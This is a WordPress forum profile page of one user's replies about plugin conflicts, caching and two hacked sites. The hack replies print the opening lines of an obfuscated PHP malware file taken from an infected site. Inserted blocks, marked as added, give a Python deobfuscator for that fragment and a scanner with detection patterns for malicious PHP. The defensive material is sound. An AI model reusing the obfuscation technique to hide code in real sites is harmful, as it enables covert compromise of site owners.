Forum Replies Created

Viewing 15 replies - 76 through 90 (of 91 total)
  • Thread Starter yellofish

    (@yellofish)

    Update:
    WP version: 4.9.6
    WPS Hide Login Version: 1.3.4.2

    you must have another plugin that conflicts with this one.

    That is possible, but isn’t solving the problem.

    I will probably remove WPS Hide and rename the pages manually.

    Thread Starter yellofish

    (@yellofish)

    To answer my own question, I found a good workaround that I like:

    I installed the “PHP Everywhere” Plugin. So on the page I just write [php_everywhere].

    Unfortunately the input box for your own code is very small. That is fine for <?php echo 'hello mars'; ?> but totally unsuitable for long php code.

    So I did this code in the little box:

    <?php
    // Build the absolute path; DOCUMENT_ROOT may or may not end with a slash.
    $path = rtrim($_SERVER['DOCUMENT_ROOT'], '/') . '/file_store/index.php';
    include($path);
    ?>

    I created a directory next to WordPress (but you can do that wherever you want, it does not have to be browser reachable).

    The index.php page I then write like any other PHP page and upload to the website.

    If you make any changes to your index.php you should still save the WordPress page, even though you didn’t change anything there. This is to clear the cache.

    Thread Starter yellofish

    (@yellofish)

    Ok, sadly I removed the pop ups. This is better than getting kicked out though.

    I rest my case and will think of other uses for your otherwise nice plugin.

    BTW, this is correct link:

    adsense policies @ pop ups

    • This reply was modified 6 years, 10 months ago by yellofish.
    Thread Starter yellofish

    (@yellofish)

    I wasn’t too clear:

    The Android app I used was FamilyGTG (it’s free and exports Gedcom, free version can’t import though).

    What I did in the meantime was to load the Gedcom into Gramps (freeware) for Windows and edit it (there were a few errors not visible in FamilyGTG). I corrected them and now it loads in RootsPersona.

    Thread Starter yellofish

    (@yellofish)

    I deleted quite a lot of PHP files with base64 script in it. I can see plenty of hits looking for exactly those files from various IPs. I also installed Wordfence and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I am pretty OK for now.

    Another thing I did is renaming the /wp-content/ folder to something else. That will irritate the bots that look for certain plugins for a while (I hope).

    Below is just an idea of what one of those (non-base64) looks like:

    <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
    $GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];
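
Added example, not part of the original post: a static decoder for the two statements quoted above. It unescapes the `\x` string into a lookup table and folds each chain of `$GLOBALS['le87e270'][n]` lookups back into the literal it spells, without running any PHP. The function names are illustrative.

```python
import re

# The two statements quoted in the post above, copied verbatim (parsed as text, never executed).
SAMPLE = r'''<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
$GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];'''

HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})')

def php_unescape(literal):
    """Decode backslash-x hex escapes (one or two digits) of a PHP double-quoted string."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), literal)

def deobfuscate(php):
    """Resolve the lookup-table indirection statically and return readable PHP text."""
    # Statement 1 has the shape: ${"<escaped variable name>"}['<table>'] = "<escaped alphabet>";
    head = re.search(r'''\$\{"([^"]*)"\}\['(\w+)'\]\s*=\s*"([^"]*)";''', php)
    if head is None:
        raise ValueError("no lookup-table assignment found")
    var, name = php_unescape(head.group(1)), head.group(2)
    table = php_unescape(head.group(3))
    ref = r"\$%s\['%s'\]\[(\d+)\]" % (re.escape(var), re.escape(name))

    def fold(run):
        # table[a].table[b]... is a string literal spelled one character at a time.
        idx = [int(i) for i in re.findall(ref, run.group(0))]
        return repr("".join(table[i] if i < len(table) else "?" for i in idx))

    rest = re.sub(r"%s(?:\.%s)*" % (ref, ref), fold, php[head.end():].strip())
    return "$%s[%r] = <%d-char table>;\n%s" % (var, name, len(table), rest)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

The second statement folds to a plain assignment that stores a PHP function name under a short random key, which is why searching such files for function names as plain text finds nothing.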
    Thread Starter yellofish

    (@yellofish)

    I found favicon****.ico files that contained PHP code, that certainly can’t be right or?

    Also found 2 scripts the SPAM delivery identified as ‘sender’:

    /public_html/domain01.coms/wp-content/advanced-cache.php

    /public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php

    xackoaqb.php was a very new file, but advanced-cache.php was a few months old.

    What is best now? Completely delete and reinstall the domains?
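
Added example, not part of the original posts: a triage pass over a site directory for the indicators described in the two posts above (PHP inside favicon `.ico` files, PHP files with base64 or `\x`-escaped strings, and a PHP file under `wp-admin/js`). The rule names, the threshold of eight escapes, and the assumption that stock WordPress keeps no PHP under `wp-admin/js` are choices made for this example; the sample tree is constructed and harmless.

```python
import os, re, tempfile
from pathlib import Path

IMAGE_EXT = {".ico", ".png", ".jpg", ".jpeg", ".gif"}
NO_PHP_DIRS = ("/wp-admin/js/",)  # assumption: stock WordPress keeps only scripts here
HEX_RUN = re.compile(rb"(?:\\x[0-9A-Fa-f]{1,2}){8,}")  # 8+ consecutive \x escapes
B64_CALL = re.compile(rb"base64_decode\s*\(", re.I)

def triage(root):
    """Return {relative_path: [reasons]} for files that deserve manual review."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            ext = os.path.splitext(fname)[1].lower()
            with open(full, "rb") as fh:
                data = fh.read(1 << 20)  # the first 1 MiB is enough for triage
            reasons = []
            if ext in IMAGE_EXT and b"<?php" in data:
                reasons.append("php-in-image")
            if ext == ".php":
                if any(d in "/" + rel for d in NO_PHP_DIRS):
                    reasons.append("php-in-script-dir")
                if HEX_RUN.search(data):
                    reasons.append("hex-escaped-string")
                if B64_CALL.search(data):  # also used legitimately: review, not a verdict
                    reasons.append("base64-decode")
            if reasons:
                findings[rel] = reasons
    return findings

def demo():
    """Triage a constructed tree of harmless stand-in files."""
    samples = {
        "favicon_ab12.ico": b"<?php echo 1; ?>",
        "wp-admin/js/widgets/new.php": b"<?php echo 2; ?>",
        "wp-content/cache-a.php": rb'<?php $a = "\x47\x4c\x4f\x42\x41\x4c\x53\x5f"; ?>',
        "wp-content/cache-b.php": b"<?php $c = base64_decode('aGk='); ?>",
        "index.php": b"<?php require 'wp-blog-header.php'; ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = Path(root, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(body)
        return triage(root)
```

Point `triage()` at a copy of the site's document root; hits are candidates for comparison against a clean copy of the same WordPress version, not proof of infection.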

    Thread Starter yellofish

    (@yellofish)

    Correct, Sucuri didn’t do anything. I got another malicious code injection.

    They install code and send SPAM from the infected domain.

    Any hints how to prevent that are appreciated.

    Thread Starter yellofish

    (@yellofish)

    Some more details. 2 Sites got hacked. Both were 4.8.2 with all updates. One was just about 1 week old.

    They put a file called ssegtj.zip in the root directory.

    In it are

    /goren/ > 14 files
    /hopeir/ > 15 files
    .htaccess
    otiarw.php
    vrairue.php

    I wonder how they managed to get that on the site?

    In the meantime I installed the sucuri plugin and I hope that can help a little. Can’t it?

    Thread Starter yellofish

    (@yellofish)

    I installed WP from a docker (shared hosting). I have no security plugin though, I just saw that there are such plugins.

    Thread Starter yellofish

    (@yellofish)

    I should actually delete this question, but let it stay anyway.

    Issue is solved. It was with the Fastest Cache plugin. I deleted the cache and it’s fine now.

    A bit poor performance by FC that it wasn’t doing any cache update for 2+ months.

    Thread Starter yellofish

    (@yellofish)

    I tried many things and couldn’t find a workaround. Finally this link helped me a lot and works perfectly >>

    https://www.ads-software.com/plugins/all-in-one-seo-pack/

    Thread Starter yellofish

    (@yellofish)

    Here is an update to my problem:

    I isolated the problem, it’s with PHP function on my pages. I write pages often in PHP and I use the Exec-PHP plugin for that.

    Here is a code example that will break my page and return a blank page:

    <?php
    
    function writeMsg() {
        echo "Hello world!";
    }
    
    writeMsg(); // call the function
    ?>

    I can reproduce it on two WP domains. If there is any Yoast user that uses PHP on their pages I would appreciate it if you can test it and see what comes out. The snippet is all you need, you don’t need any additional lines of code.

    • This reply was modified 7 years, 10 months ago by yellofish.
    Thread Starter yellofish

    (@yellofish)

    Yeah, I deleted that plugin now. Will probably take a few days till it’s out of all cache.

    I will set the social icons manually.

    Thread Starter yellofish

    (@yellofish)

    Here is a page:

    https://www.5-day-shenzhen-visa.com

    I used https://www.webpagetest.org to see what’s loading. I guess it might be theme related.

    I’d like to add that I used a little PHP on 2 pages (the FAQ), and no own CSS at all.

    @jan
    I have a social media plugin, I use it only for Facebook and G+. I did disable it before and the pages in question were still called.

    • This reply was modified 7 years, 10 months ago by yellofish.

    I have the same problem.

    WP 4.7
    Cloudflare 3.1.1
    All plugins are disabled, except cloudflare
    I have no root access

    So what next?
